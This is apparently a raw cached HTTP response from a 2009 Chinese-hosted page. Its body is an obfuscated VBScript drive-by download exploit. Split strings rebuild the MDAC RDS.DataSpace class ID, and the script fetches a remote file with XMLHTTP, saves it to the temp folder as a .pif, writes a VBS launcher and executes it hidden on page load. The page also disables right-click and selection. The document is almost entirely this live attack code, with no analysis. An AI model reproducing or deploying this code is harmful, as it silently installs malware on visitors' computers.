HTTP/1.1 200 OK
Content-Length: 2523
ETag: "d4addc35c1a2c91:299"
Date: Thu, 12 Mar 2009 07:05:41 GMT
Last-Modified: Thu, 12 Mar 2009 03:18:27 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/14.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:13:41 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:59 GMT

<script src="14.js"></script>
<script language=VBScript>
On Error Resume Next
vi = "c":vfi = "vcpvv"
poteid="clsid:"
poteidx="BD"
poteid4="56-6"
poteid6="3-1"
poteid8="0-98"
set pote_2_cn = document.createElement("object")
poteiD12="29E"
poteid9="3A-0"
poteID13="36"
poteid5="5A"
poteid7="1D"
poteid3="C5"
poteid11="4FC"
poteid10="0C0"
poteid2="96"
dadong="classid"
pote3="Micro"
pote6="E"
pote4="soft.XM"
giceeee="LHTTp"
pote5="G"
pote7="T"
pote_2_cn.SetAttribute dadong,  poteid&poteidx&poteid2&poteid3&poteid4&poteid5&poteid6&poteid7&poteid8&poteid9&poteid10&poteid11&poteiD12&poteID13
fuckassdf="c"
Set lovepote=pote_2_cn.CreateObject(pote3&pote4&giceeee,"")
lovepote.Open pote5&pote6&pote7, pote, False
lovepote.Send
pote_kiteggggggggg="poteEeee.pif"
pote_kitegggggggggs="poteeeee.vbs"
Q123456s="FileSyst"
Q123456sssx="b.stream"
Q123456="Scripting."
Q123456sss="Adod"
Q123456ss="emObject"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = pote_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
poteuser="chilam"
pote_kiteggggggggg=chilam.BuildPath(yingying,pote_kiteggggggggg)
pote_kitegggggggggs=chilam.BuildPath(yingying,pote_kitegggggggggs)
Set chilams = pote_2_cn.createobject(Q123456sssss,"")
Set dncj = lovepote
chilams.type=1
chilams.Open
chilams.Write dncj.ResponseBody	
</scripT><script language="JavaScript">
chilams["Savetofile"](pote_kiteggggggggg,2);
</script><script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText  "'I LOVE pote TEAM"&"'I LOVE pote TEAM"&vbCrLf&"Set Love_pote = CreateObject(""Wscript"&".Shell"")"&"'I LOVE pote TEAM"&vBCrLf&"'I LOVE gomeee TEAM"&"'i LOVE gomeee TEAM"&vbCrLf&"Love_pote.run ("""&pote_kiteggggggggg&""")"&vbCrLf&"'I LOVE pote TEAM"&"'I LOVE pote TEAM"
chilams.Savetofile pote_kitegggggggggs,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
potedk="O"
potedks="p"
potedkss="e"
potedksss="n"
nurewg="cccc"
Set cute_qq_cn_qq_123456 = pote_2_cn.createobject(www&cute&qq&cn&kfqq, "")
Set xxxxxxxxbxxxqqqqqqqq = pote_2_cn.createobject(www&cute&qq&cn&kfqq, "")
xxxxxxxxbxxxqqqqqqqq.ShellExeCute pote_kitegggggggggs, "", "", potedk&potedks&potedkss&potedksss, 0
</script><script type="text/jscript">function init() { document.write("");}window.onload = init;document.write("");</script>
<br><Br><br><br><br><br><br><br><br>
<body ondragstart="return false" onselectstart="return false" oncontextmenu="return false">